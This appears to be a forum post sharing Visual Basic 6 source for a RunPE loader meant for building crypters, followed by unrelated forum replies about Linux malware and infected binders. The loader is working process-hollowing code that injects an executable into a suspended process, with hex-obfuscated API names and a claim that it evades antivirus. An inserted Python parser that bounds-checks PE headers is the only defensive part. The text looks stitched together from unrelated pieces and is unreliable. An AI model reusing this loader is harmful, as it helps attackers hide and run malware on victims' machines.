Figure out for yourselves what it does, which function it calls and how.
For loading an executable in memory, for those who want to make a crypter. Author: f0rce. The credits (what his work is based on) are in the class file (.cls) for Visual Basic 6 (so everyone understands). It should work on XP, Vista, Windows 7; if I have time I'll test it.

'---------------------------------------------------------------------------------------
' Module      : cRunPE
' DateTime    : 14/06/2010
' Author      : f0rce
' Purpose     : RunPE
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Thanks to   : SqUeEzEr - NTLoadLibrary & NTGetProcAddress
'               Cobein - Normal RunPE structure
'               Karcrack - Invoke
'
' Compile     : It work with all Compile Options but Compile with Native it will be FUD
'
' History     : 14/06/2010 First Cut....................................................
'---------------------------------------------------------------------------------------
Option Explicit

Private Const THUNK_APICALL As String = "384234433234303835313C5041544348313E45383C5041544348323E3539383930313636333143304333" '"8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3"
Private Const PATCH1 As String = "3C5041544348313E" '"<PATCH1>"
Private Const PATCH2 As String = "3C5041544348323E" '"<PATCH2>"

Private Declare Function LdrLoadDll Lib "NTDLL" (ByVal pWPathToFile As Long, ByVal Flags As Long, ByRef pwModuleFileName As UNICODE_STRING, ByRef ModuleHandle As Long) As Long
Private Declare Sub MoveMe Lib "MSVBVM60" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL" (DestinationString As Any, ByVal SourceString As Long)
Private Declare Function LdrGetProcedureAddress Lib "NTDLL" (ByVal ModuleHandle As Long, ByRef paFunctionName As Long, ByVal Ordinal As Integer, ByRef FunctionAddress As Long) As Long

Private c_bInit As Boolean
Private c_lVTE As Long
Private c_lOldVTE As Long
Private c_bvASM(&HFF) As Byte

Private Const CONTEXT_FULL As Long = &H10007
Private Const MAX_PATH As Integer = 260
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40

Private Const sKlib As String = "4B65726E656C3332" 'Kernel32
Private Const sNlib As String = "4E74646C6C" 'Ntdll
Private Const sCApi As String = "43726561746550726F6365737357" 'CreateProcessW
Private Const sNApi As String = "4E74556E6D6170566965774F6653656374696F6E" 'NtUnmapViewOfSection
Private Const sRtApi As String = "52746C4D6F76654D656D6F7279" 'RtlMoveMemory
Private Const sVApi As String = "5669727475616C416C6C6F634578" 'VirtualAllocEx
Private Const sWApi As String = "577269746550726F636573734D656D6F7279" 'WriteProcessMemory
Private Const sGApi As String = "476574546872656164436F6E74657874" 'GetThreadContext
Private Const sSApi As String = "536574546872656164436F6E74657874" 'SetThreadContext
Private Const sRApi As String = "526573756D65546872656164" 'ResumeThread

Private Type UNICODE_STRING
    uLength As Integer
    uMaximumLength As Integer
    pBuffer As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type

Private Type FLOATING_SAVE_AREA
    ControlWord As Long
    StatusWord As Long
    TagWord As Long
    ErrorOffset As Long
    ErrorSelector As Long
    DataOffset As Long
    DataSelector As Long
    RegisterArea(1 To 80) As Byte
    Cr0NpxState As Long
End Type

Private Type CONTEXT
    ContextFlags As Long
    Dr0 As Long
    Dr1 As Long
    Dr2 As Long
    Dr3 As Long
    Dr6 As Long
    Dr7 As Long
    FloatSave As FLOATING_SAVE_AREA
    SegGs As Long
    SegFs As Long
    SegEs As Long
    SegDs As Long
    Edi As Long
    Esi As Long
    Ebx As Long
    Edx As Long
    Ecx As Long
    Eax As Long
    Ebp As Long
    Eip As Long
    SegCs As Long
    EFlags As Long
    Esp As Long
    SegSs As Long
End Type

Private Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long
End Type

Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
End Type

Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

Private Type IMAGE_EXPORT_DIRECTORY
    Characteristics As Long
    TimeDateStamp As Long
    MajorVersion As Integer
    MinorVersion As Integer
    lpName As Long
    Base As Long
    NumberOfFunctions As Long
    NumberOfNames As Long
    lpAddressOfFunctions As Long
    lpAddressOfNames As Long
    lpAddressOfNameOrdinals As Long
End Type

Private Type IMAGE_SECTION_HEADER
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    Characteristics As Long
End Type

Public Function zDoNotCall() As Long
    ' This function will be replaced with machine code laterz
    ' Do not add any public procedure on top of it
End Function

Public Sub CallMe(szProcessName As String, lpBuffer() As Byte, sParameter As String)
    Dim Pidh As IMAGE_DOS_HEADER
    Dim Pinh As IMAGE_NT_HEADERS
    Dim Pish As IMAGE_SECTION_HEADER
    Dim Si As STARTUPINFO
    Dim Pi As PROCESS_INFORMATION
    Dim Ctx As CONTEXT
    Dim i As Long

    Si.cb = Len(Si)
    Ctx.ContextFlags = CONTEXT_FULL

    Call Invoke(GetPointer("3"), VarPtr(Pidh), VarPtr(lpBuffer(0)), Len(Pidh))
    Call Invoke(GetPointer("3"), VarPtr(Pinh), VarPtr(lpBuffer(Pidh.e_lfanew)), Len(Pinh))
    Call Invoke(GetPointer("1"), 0, StrPtr(szProcessName) & " " & sParameter, 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(Si), VarPtr(Pi))
    Call Invoke(GetPointer("2"), Pi.hProcess, Pinh.OptionalHeader.ImageBase)
    Call Invoke(GetPointer("4"), Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    Call Invoke(GetPointer("5"), Pi.hProcess, Pinh.OptionalHeader.ImageBase, VarPtr(lpBuffer(0)), Pinh.OptionalHeader.SizeOfHeaders, 0)

    For i = 0 To Pinh.FileHeader.NumberOfSections - 1
        Call MoveMe(Len(Pish), Pish, lpBuffer(Pidh.e_lfanew + Len(Pinh) + Len(Pish) * i))
        Call Invoke(GetPointer("5"), Pi.hProcess, Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, VarPtr(lpBuffer(Pish.PointerToRawData)), Pish.SizeOfRawData, 0)
    Next

    Call Invoke(GetPointer("6"), Pi.hThread, VarPtr(Ctx))
    Call Invoke(GetPointer("5"), Pi.hProcess, Ctx.Ebx + 8, VarPtr(Pinh.OptionalHeader.ImageBase), 4, 0)
    Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
    Call Invoke(GetPointer("7"), Pi.hThread, VarPtr(Ctx))
    Call Invoke(GetPointer("8"), Pi.hThread)
End Sub

Private Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long
    Dim lPtr As Long
    Dim i As Long
    Dim sData As String
    Dim sParams As String

    If lMod = 0 Then Exit Function

    For i = UBound(Params) To 0 Step -1
        sParams = sParams & Hex2Str("3638") & GetLong(CLng(Params(i)))
    Next

    lPtr = VarPtr(c_bvASM(0))
    lPtr = lPtr + (UBound(Params) + 2) * 5
    lPtr = lMod - lPtr - 5

    sData = Hex2Str(THUNK_APICALL)
    sData = Replace$(sData, Hex2Str(PATCH1), sParams)
    sData = Replace$(sData, Hex2Str(PATCH2), GetLong(lPtr))

    Call PutThunk(sData)
    Invoke = PatchCall
End Function

Private Function GetLong(ByVal lData As Long) As String
    Dim bvTemp(3) As Byte
    Dim i As Long
    Call MoveMe(&H4, bvTemp(0), lData)
    For i = 0 To 3
        GetLong = GetLong & Right$(Hex2Str("30") & Hex$(bvTemp(i)), 2)
    Next
End Function

Private Sub PutThunk(ByVal sThunk As String)
    Dim i As Long
    For i = 0 To Len(sThunk) - 1 Step 2
        c_bvASM((i / 2)) = CByte(Hex2Str("2668") & Mid$(sThunk, i + 1, 2))
    Next
End Sub

Private Function PatchCall() As Long
    Call MoveMe(&H4, c_lVTE, ByVal ObjPtr(Me))
    c_lVTE = c_lVTE + &H1C
    Call MoveMe(&H4, c_lOldVTE, ByVal c_lVTE)
    Call MoveMe(&H4, ByVal c_lVTE, VarPtr(c_bvASM(0)))
    PatchCall = zDoNotCall
    Call MoveMe(&H4, ByVal c_lVTE, c_lOldVTE)
End Function

Public Property Get Initialized() As Boolean
    Initialized = c_bInit
End Property

Private Sub Class_Initialize()
    c_bInit = True
End Sub

Public Function Hex2Str(ByVal strData As String)
    Dim i As Long, CryptString As String, tmpChar As String
    On Local Error Resume Next
    For i = 1 To Len(strData) Step 2
        CryptString = CryptString & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(strData, i, 2)))
    Next i
    Hex2Str = CryptString
End Function

Public Function GetPointer(PTR As String) As Long
    GetPointer = 0
    If PTR = "1" Then
        GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sCApi))
    Else
    End If
    If PTR = "2" Then
        GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sNlib)), Hex2Str(sNApi))
    Else
    End If
    If PTR = "3" Then
        GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sRtApi))
    Else
    End If
    If PTR = "4" Then
        GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sVApi))
    Else
    End If
    If PTR = "5" Then
        GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sWApi))
    Else
    End If
    If PTR = "6" Then
        GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sGApi))
    Else
    End If
    If PTR = "7" Then
        GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sSApi))
    Else
    End If
    If PTR = "8" Then
        GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sRApi))
    Else
    End If
End Function

Public Function NtGetProcAddr(ByVal lModuleHandle As Long, ByVal sProc As String)
As Long Dim i As Long Dim ANSI() As Byte ReDim ANSI(0 To Len(sProc)) For i = 1 To Len(sProc) ANSI(i - 1) = Asc(Mid$(sProc, i, 1)) Next i Call LdrGetProcedureAddress(lModuleHandle, VarPtr(ANSI(0)), ByVal 0&, NtGetProcAddr) End Function Public Function NtLoadLibrary(ByVal sName As String) As Long Dim US As UNICODE_STRING Call RtlInitUnicodeString(US, StrPtr(sName)) Call LdrLoadDll(ByVal 0&, ByVal 0&, US, NtLoadLibrary) End Function
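The VB code above reads IMAGE_DOS_HEADER, IMAGE_NT_HEADERS and the section table straight out of lpBuffer and trusts every offset in them (e_lfanew, PointerToRawData, SizeOfRawData, VirtualAddress). Anyone writing analysis or triage tooling around PE files needs the same three structures, but with the bounds checks that the loader skips. The following parser is an added example, not code from the post; it handles only PE32 (Magic 0x10B, the layout the VB types describe), and the sample image it builds is constructed inline and is not a real binary.

```python
"""Minimal PE32 header parser with bounds checks (added example, not from the post)."""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D       # 'MZ'
IMAGE_NT_SIGNATURE = 0x00004550    # 'PE\0\0'
PE32_MAGIC = 0x10B
SIZEOF_FILE_HEADER = 20
SIZEOF_SECTION_HEADER = 40
SECTION_FMT = "<8sIIIIIIHHI"       # matches the IMAGE_SECTION_HEADER layout above


class PEFormatError(ValueError):
    """Raised when a header field points outside the buffer or is inconsistent."""


def parse_pe(buf: bytes) -> dict:
    """Parse DOS header, NT headers and section table, validating every offset."""
    if len(buf) < 0x40:
        raise PEFormatError("buffer shorter than IMAGE_DOS_HEADER")
    (e_magic,) = struct.unpack_from("<H", buf, 0)
    if e_magic != IMAGE_DOS_SIGNATURE:
        raise PEFormatError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", buf, 0x3C)
    if e_lfanew + 4 + SIZEOF_FILE_HEADER > len(buf):
        raise PEFormatError("e_lfanew points outside the buffer")
    (sig,) = struct.unpack_from("<I", buf, e_lfanew)
    if sig != IMAGE_NT_SIGNATURE:
        raise PEFormatError("missing PE signature")

    fh_off = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, fh_off)
    opt_off = fh_off + SIZEOF_FILE_HEADER
    if opt_off + opt_size > len(buf):
        raise PEFormatError("optional header extends past the buffer")
    (magic,) = struct.unpack_from("<H", buf, opt_off)
    if magic != PE32_MAGIC:
        raise PEFormatError("only PE32 (Magic 0x10B) is handled here")
    # Field offsets inside IMAGE_OPTIONAL_HEADER (PE32): see the VB type above.
    (entry,) = struct.unpack_from("<I", buf, opt_off + 16)
    (image_base,) = struct.unpack_from("<I", buf, opt_off + 28)
    (size_of_image,) = struct.unpack_from("<I", buf, opt_off + 56)
    (size_of_headers,) = struct.unpack_from("<I", buf, opt_off + 60)
    if size_of_headers > len(buf):
        raise PEFormatError("SizeOfHeaders larger than the buffer")

    sections = []
    sec_off = opt_off + opt_size
    for i in range(nsections):
        off = sec_off + i * SIZEOF_SECTION_HEADER
        if off + SIZEOF_SECTION_HEADER > len(buf):
            raise PEFormatError("section table truncated")
        name, vsize, va, rawsize, rawptr, _, _, _, _, sec_chars = struct.unpack_from(SECTION_FMT, buf, off)
        # The loader copies rawsize bytes from rawptr; both must lie inside the file.
        if rawptr + rawsize > len(buf):
            raise PEFormatError(f"section {i}: raw data outside the buffer")
        if va + max(vsize, rawsize) > size_of_image:
            raise PEFormatError(f"section {i}: mapped range exceeds SizeOfImage")
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize,
            "pointer_to_raw_data": rawptr, "size_of_raw_data": rawsize,
            "characteristics": sec_chars,
        })
    return {
        "machine": machine, "characteristics": chars, "entry_point": entry,
        "image_base": image_base, "size_of_image": size_of_image,
        "size_of_headers": size_of_headers, "sections": sections,
    }


def build_sample_pe() -> bytes:
    """Construct a tiny, well-formed PE32 image with one .text section (constructed sample)."""
    file_align, sect_align, opt_size = 0x200, 0x1000, 224
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)                     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                   # ImageBase
    struct.pack_into("<I", opt, 32, sect_align)
    struct.pack_into("<I", opt, 36, file_align)
    struct.pack_into("<I", opt, 56, 0x2000)                     # SizeOfImage
    struct.pack_into("<I", opt, 60, file_align)                 # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    section = struct.pack(SECTION_FMT, b".text", 0x10, 0x1000, file_align, file_align,
                          0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + section).ljust(file_align, b"\0")
    code = b"\xC3".ljust(file_align, b"\0")                     # a single 'ret'
    return headers + code


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(hex(info["image_base"]), hex(info["entry_point"]), info["sections"][0]["name"])
```

The two section checks are the ones that matter when a file arrives from an untrusted source: a PointerToRawData or SizeOfRawData beyond the end of the file is the classic way a malformed image makes a naive copier read out of bounds, which is exactly what the unchecked loop in CallMe would do.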
I know they have existed for a long time, but their industry is not as flourishing as on Windows. And the reasons are simple: Windows offers more programming languages plus .NET, which eases the "work" a lot, there are very many examples and a great deal of documentation, and most importantly, there are far more Windows users. I also wanted to move on to writing malware for Linux, I made that Darky Binder (v2.0) for Linux, but it didn't really captivate me.
What is so wonderful to you about it being open-source? How many patches have you written? How many times have you looked at the source? The point is to stop bringing up this pseudo-argument. Besides, on an open-source project a patch can come from some Uncle Vasile from the top of the village, whereas at Microsoft there are well-paid people who know what they are doing.
Nobody sat around infecting that many files. Anyway, I'm sure there are infected files too, but not by him. Usually, though, those who make such programs don't infect them, but it is possible that the "priv8" ones are infected. Congratulations on the work you put in.